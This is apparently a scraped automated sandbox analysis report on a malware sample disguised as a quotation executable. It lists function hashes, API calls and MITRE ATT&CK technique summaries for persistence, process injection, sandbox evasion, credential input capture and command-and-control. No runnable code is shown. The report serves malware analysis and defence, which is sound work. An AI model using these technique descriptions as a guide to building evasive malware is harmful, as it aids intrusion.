Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a6a764c411c997e18fd12a6d1d0d6ce66d3880da884c8ba396ed934403149e1f
Instruction ID: 0401e9364f0234b102160894a2419e1556d6e3bb25102dc4b210bffc2833df5a
Opcode Fuzzy Hash: a6a764c411c997e18fd12a6d1d0d6ce66d3880da884c8ba396ed934403149e1f
Instruction Fuzzy Hash: CE1103B69002498FDB10CF9AC444ADFFBF4EB88314F14842AE429A7300C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054495C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0544962E

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 963443db7c0f870c41361e8af5b059c537cda5cc23feaf3c19e0a9ce818fa3aa
Instruction ID: 04cf8409812c1251f8e70cb440c5d38f32f999d01e82f065d939b5d4369ecda3
Opcode Fuzzy Hash: 963443db7c0f870c41361e8af5b059c537cda5cc23feaf3c19e0a9ce818fa3aa
Instruction Fuzzy Hash: D111DFB5D006498FDB20CF9AC444ADFFBF4AB89214F10846AD829A7600D375A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0544FE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0544FE9D

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: cf43b28d7db7ede10ffc832c3b8ff3d2f80692a7969c600c43b66c8768c402ff
Instruction ID: 30c9b22d645a2387a03f3d0926221d811cdfa237221ad32d9e918366203f323e
Opcode Fuzzy Hash: cf43b28d7db7ede10ffc832c3b8ff3d2f80692a7969c600c43b66c8768c402ff
Instruction Fuzzy Hash: DB1103B58002499FDB10CF99D489BDEFBF8EB88324F20841AE859B7301D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0544FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0544FE9D

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 923728d7946b51db74888f109a8ea501b7527d2c1b4150be33ab453de75184cc
Instruction ID: abe62dd65747dc713ae198231b383ccb7870be3953606dd8d477687afcd87615
Opcode Fuzzy Hash: 923728d7946b51db74888f109a8ea501b7527d2c1b4150be33ab453de75184cc
Instruction Fuzzy Hash: 661103B58002489FDB10CF99D484BDEBBF8EB88324F20841AE819A7300C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CED4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.315597489.0000000002CED000.00000040.00000001.sdmp, Offset: 02CED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8831b192384a76f0be46579c900d753944dcb282e01f8881250abbf0ebbec0c6
Instruction ID: 83a2a3456c47952bdfc68aa749cd3392d8355747def791e92101f54b4068582a
Opcode Fuzzy Hash: 8831b192384a76f0be46579c900d753944dcb282e01f8881250abbf0ebbec0c6
Instruction Fuzzy Hash: 712103B1504244DFDF05CF54D9C0B2ABF69FB88328F24C569E90B4B216C336E915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CFD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.315630110.0000000002CFD000.00000040.00000001.sdmp, Offset: 02CFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98210ed936de01e961f628f9534a6083f9ba1845830a5b8f2d8aacec10a8a885
Instruction ID: beb2a9b3708a1ab2109b9c276f5f2f21b9f21379d16fc21922f88275685c4675
Opcode Fuzzy Hash: 98210ed936de01e961f628f9534a6083f9ba1845830a5b8f2d8aacec10a8a885
Instruction Fuzzy Hash: B4210470608244EFDB94DF14D9C0B2ABB65FB84314F24C569EA0B4B646C736D807CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CFD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.315630110.0000000002CFD000.00000040.00000001.sdmp, Offset: 02CFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529f65546d105ae6e36fafe43db59af57333dbe137385eb1d96f4a47c51f23f9
Instruction ID: b6e4dff19bdc21490234bc173e49c76ca2601909e4b3144895fb2cb89457eb11
Opcode Fuzzy Hash: 529f65546d105ae6e36fafe43db59af57333dbe137385eb1d96f4a47c51f23f9
Instruction Fuzzy Hash: B72192755083C09FCB42CF20D990715BF71EB86214F28C5EAD8498B667C33AD90ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CED49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.315597489.0000000002CED000.00000040.00000001.sdmp, Offset: 02CED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4f522c25aa1cbdd320e5f5d9363831d84a4238d435101ec49e5e0208effc36
Instruction ID: 6997ac0adcc6dbc3075176125b6f45dc335486ddc6945a2575ee8613c01cf6c6
Opcode Fuzzy Hash: ab4f522c25aa1cbdd320e5f5d9363831d84a4238d435101ec49e5e0208effc36
Instruction Fuzzy Hash: 7411D3B6904280DFCF12CF54D9C4B5ABF71FB84324F24C6A9D8060B256C336D55ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Quotation ATB-PR28500KINH.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Function 010270C9, Relevance: .6, Instructions: 624
COMMONCrypto

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre